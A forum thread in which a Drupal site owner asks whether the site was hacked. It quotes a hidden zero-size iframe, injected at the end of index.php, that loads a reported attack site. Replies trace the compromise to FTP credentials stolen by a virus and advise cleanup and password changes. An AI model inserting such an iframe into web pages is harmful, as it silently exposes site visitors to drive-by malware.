[SOLVED] Is it my website being hacked?

[chaiwei]

Hi,

 

My website was being syntax error when this morning I wake up.

I found out that my index.php in www folder got this line

<iframe frameborder="0" onload="if (!this.src){ this.src='http://iqsp.ru:8080/index.php'; this.height='0'; this.width='0';}" >tlimbgnxscyelhhuuqhvchjqcghsbyt</iframe>

After that I go to this website

http://iqsp.ru:8080/index.php

It is a reported attack website.

 

Is there any possible way to know why was this happened?

Someone can access to my index.php?

[btherl]

Yes, it looks like you've been hacked.  Have you downloaded and installed any scripts on your website?  Or any forum software, guestbook software, etc etc?

[trq]

Many ways this could happen.

 

We had an attack here at work the other week where someone had written javascript to our database creating a XSS attack via an SQL injection.

 

Is this line of javascript actually hard coded into your index.php file or does it come from your database?

[chaiwei]

Hi thanks for reply,

 

I am using drupal and I have download the drupal module only.

It is hardcoded in my index.php

Because in drupal index.php

after they open a php tag they didnt close it.

my index.php looks like this

<?php
require_once './includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);

$return = menu_execute_active_handler();

// Menu status constants are integers; page content is a string.
if (is_int($return)) {
  switch ($return) {
    case MENU_NOT_FOUND:
      drupal_not_found();
      break;
    case MENU_ACCESS_DENIED:
      drupal_access_denied();
      break;
    case MENU_SITE_OFFLINE:
      drupal_site_offline();
      break;
  }
}
elseif (isset($return)) {
  // Print any value (including an empty string) except NULL or undefined:
  print theme('page', $return);
}

drupal_page_footer();

<iframe frameborder="0" onload="if (!this.src){ this.src='http://iqsp.ru:8080/index.php'; this.height='0'; this.width='0';}" >tlimbgnxscyelhhuuqhvchjqcghsbyt</iframe>

 

So they insert the iframe in last line.

So it will causing syntax error. because no close php tag and there is nothing call <iframe in php

[chaiwei]

Anyone have any idea to deal with this?

It is not sql injection neither javascript XSS but it is permanently hard coded into my index.php

my index.php permission was set to 664 only.

 

what can done so or they  use php or anything else to do that?

either they hacked into my other script and rewrite my index.php?

 

 

 

[obay]

just "Find All" instances of that text in all your pages, then remove them. upload your pages.

 

then change your password

[Gayner]

just "Find All" instances of that text in all your pages, then remove them. upload your pages.

 

then change your password

 

Changing ur password has nothing to do with this, but yea go ahead change it again!

[chaiwei]

Its looks like my personal computer infected by virus.

According to my hosting provider said,

 

Your personal computer is most probably affected.

Yes, the virus is getting the password from your local computer.

Yes, the files listed above have been modified over FTP.

 

I am really weak with the security part.

So could the virus stole my ftp password inside my computer?

I am using filezilla and editplus.

So is this called phishing?

[btherl]

Ok, the important part of what they said is "the files listed have been modified over FTP".  That means access was made using your username and password.

 

Have you got antivirus software installed?  If not, you should install that.

 

You should also make sure your computer has all the automatic updates from Windows Update.

 

If you have trouble cleaning the virus, it's best if you go to a forum that specializes in these things.

 

And of course you should change your password   Change it now, and then change it again after you're sure there's no viruses left on your computer.

[Gayner]

after you're sure there's no viruses left on your computer[/b].

In jesus's name amen.